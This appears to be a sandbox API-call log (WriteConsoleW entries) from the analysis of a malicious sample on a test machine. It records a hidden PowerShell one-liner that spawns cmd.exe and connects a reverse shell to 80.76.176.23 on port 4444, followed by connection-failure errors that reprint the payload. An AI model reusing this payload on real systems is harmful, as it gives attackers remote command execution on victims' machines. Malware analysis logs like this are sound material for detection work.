WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
powershell
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
-w hidden -nop -c $a='80.76.176.23';$b=4444;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) { $r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsCompleted -and $esread.Result -ne 0) { $r=$es.BaseStream.EndRead($esread); $s.Write($eb,0,$r); $s.Flush(); $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null); } if ($s.DataAvailable) { $r=$s.Read($nb,0,$nb.Length); if ($r -lt 1) { break; } else { $str=$e.GetString($nb,0,$r); $is.write($str); } } if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) { break; } if ($p.ExitCode -ne $null) { break; }}
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Exception calling "Connect" with "2" argument(s): "A connection attempt failed
console_handle:
0x00000023
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
because the connected party did not properly respond after a period of time, or
console_handle:
0x0000002f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
established connection failed because connected host has failed to respond 80.
console_handle:
0x0000003b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At line:1 char:667
console_handle:
0x00000053
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $a='80.76.176.23';$b=4444;$c=New-Object system.net.sockets.tcpclient;$nb=New-
console_handle:
0x0000005f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$e
console_handle:
0x0000006b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
b=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-
console_handle:
0x00000077
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.
console_handle:
0x00000083
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.Redi
console_handle:
0x0000008f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
rectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.Standar
console_handle:
0x0000009b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
dInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginR
console_handle:
0x000000a7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0,
console_handle:
0x000000b3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
$eb.Length, $null, $null);$c.connect <<<< ($a,$b);$s=$c.GetStream();while ($tru
console_handle:
0x000000bf
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
e) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) { $
console_handle:
0x000000cb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$os.
console_handle:
0x000000d7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsComplet
console_handle:
0x000000e3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ed -and $esread.Result -ne 0) { $r=$es.BaseStream.EndRead($esread); $s.Write($e
console_handle:
0x000000ef
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
b,0,$r); $s.Flush(); $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null
console_handle:
0x000000fb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
, $null); } if ($s.DataAvailable) { $r=$s.Read($nb,0,$nb.Length); if ($r -lt 1)
console_handle:
0x00000107
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
{ break; } else { $str=$e.GetString($nb,0,$r); $is.write($str); } } if ($c.Con
console_handle:
0x00000113
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
nected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectR
console_handle:
0x0000011f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ead) -and $c.Client.Available -eq 0)) { break; } if ($p.ExitCode -ne $null) { b
console_handle:
0x0000012b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
reak; }}
console_handle:
0x00000137
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle:
0x00000143
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : DotNetMethodException
console_handle:
0x0000014f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Exception calling "GetStream" with "0" argument(s): "The operation is not allow
console_handle:
0x0000016f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ed on non-connected sockets."
console_handle:
0x0000017b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At line:1 char:690
console_handle:
0x00000187
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $a='80.76.176.23';$b=4444;$c=New-Object system.net.sockets.tcpclient;$nb=New-
console_handle:
0x00000193
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$e
console_handle:
0x0000019f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
b=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-
console_handle:
0x000001ab
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.
console_handle:
0x000001b7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.Redi
console_handle:
0x000001c3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
rectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.Standar
console_handle:
0x000001cf
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
dInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginR
console_handle:
0x000001db
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0,
console_handle:
0x000001e7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
$eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream <<<< ();while ($tru
console_handle:
0x000001f3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
e) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) { $
console_handle:
0x000001ff
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$os.
console_handle:
0x0000020b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsComplet
console_handle:
0x00000217
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ed -and $esread.Result -ne 0) { $r=$es.BaseStream.EndRead($esread); $s.Write($e
console_handle:
0x00000223
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
b,0,$r); $s.Flush(); $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null
console_handle:
0x0000022f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
, $null); } if ($s.DataAvailable) { $r=$s.Read($nb,0,$nb.Length); if ($r -lt 1)
console_handle:
0x0000023b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
{ break; } else { $str=$e.GetString($nb,0,$r); $is.write($str); } } if ($c.Con
console_handle:
0x00000247
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
nected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectR
console_handle:
0x00000253
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ead) -and $c.Client.Available -eq 0)) { break; } if ($p.ExitCode -ne $null) { b
console_handle:
0x0000025f
|
1
|
1 |
0
|